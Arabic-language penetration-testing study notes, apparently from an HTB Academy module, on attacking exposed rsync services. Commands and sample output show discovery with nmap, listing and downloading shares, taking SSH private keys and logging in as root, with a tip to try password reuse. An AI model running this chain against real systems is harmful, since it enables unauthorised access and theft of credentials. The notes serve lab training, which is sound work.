◄ BACK TO PROTOCOLS
► HTB ACADEMY · MODULE 112 · SECTION 17/21
RSYNC — REMOTE SYNC
FILE SYNC · BACKUP TOOL · SENSITIVE FILE EXPOSURE
873
TCP Port
Delta
Transfer Algorithm
No Auth
ممكن بدون كلمة سر
id_rsa
Target File
SSH
يشتغل فوقه
ما هو Rsync؟

أداة سريعة وفعّالة لنسخ الملفات محلياً وعن بعد. تستخدم Delta Transfer Algorithm — ترسل فقط الفرق بين الملفات بدل الملف كامل. تستخدم كثيراً للـ backups والـ mirroring.

Delta Transfer — ليش مهم؟
عندك ملف 1GB على جهازك
نسخة قديمة منه على السيرفر

Rsync ما يرسل الـ 1GB كامل!
يرسل بس الفرق (delta)
= أسرع وأوفر في الـ bandwidth ✅
ليش خطير في Pentest؟
Rsync يستخدم للـ backups
الـ backup يحتوي:
• SSH keys (id_rsa)
• ملفات config
• /etc/shadow (hashes)
• database dumps
لو بدون auth = كنز! 💀
⚠️ لو حصلت على credentials في pentest ولاقيت Rsync = جرب password reuse عشان تحمّل ملفات حساسة
💻 الأوامر الكاملة
STEP 1 — اكتشاف Rsync:
sudo nmap -sV -p 873 TARGET PORT STATE SERVICE VERSION 873/tcp open rsync (protocol version 31)
STEP 2 — شوف الـ Shares المتاحة:
nc -nv TARGET 873 @RSYNCD: 31.0 #list dev Dev Tools ← اسم الـ share! @RSYNCD: EXIT
STEP 3 — Enumerate الـ Share:
rsync -av --list-only rsync://TARGET/dev drwxr-xr-x 48 . -rw-r--r-- 0 build.sh -rw-r--r-- 0 secrets.yaml ← مثير للاهتمام! drwx------ 54 .ssh ← SSH keys! 🎯
STEP 4 — حمّل كل شيء:
# تحميل الـ share كامل: rsync -av rsync://TARGET/dev ./local_copy # تحميل مجلد .ssh فقط: rsync -av rsync://TARGET/dev/.ssh ./ # لو Rsync فوق SSH: rsync -av -e ssh rsync://TARGET/dev ./ rsync -av -e "ssh -p2222" rsync://TARGET/dev ./
STEP 5 — استخدم الـ Private Key:
chmod 600 .ssh/id_rsa ssh -i .ssh/id_rsa root@TARGET Welcome to Ubuntu! ← 💥 RCE!
🎯 .ssh/id_rsa = private key = دخول مباشر على SSH بدون باسورد!
⛓️ Attack Chain
🔍
Nmap
Port 873
📋
List Shares
nc -nv
🔎
Enumerate
--list-only
⬇️
Download
.ssh/id_rsa
💥
SSH Access
-i id_rsa
🌐 Q&A
ليش Rsync خطير في الـ pentest؟
لأنه يستخدم للـ backups — والـ backup يحتوي على كل شيء: SSH keys, ملفات config, /etc/shadow, database dumps. لو Rsync مفتوح بدون authentication = تحمّل كل هاي الملفات الحساسة مجاناً.
إيش Delta Transfer Algorithm؟
بدل ما يرسل الملف كامل، Rsync يقارن الملف الجديد بالقديم ويرسل بس الفرق (delta). ملف 1GB تغير 10MB منه = يرسل 10MB فقط. أسرع بكثير وأوفر في الـ bandwidth.
إيش تعمل لو حصلت على id_rsa؟
chmod 600 id_rsa عشان تغير الصلاحيات للـ private key، بعدين ssh -i id_rsa root@TARGET = دخول مباشر بدون باسورد. الـ chmod مهم لأن SSH يرفض الـ key لو صلاحياته مفتوحة لغيرك.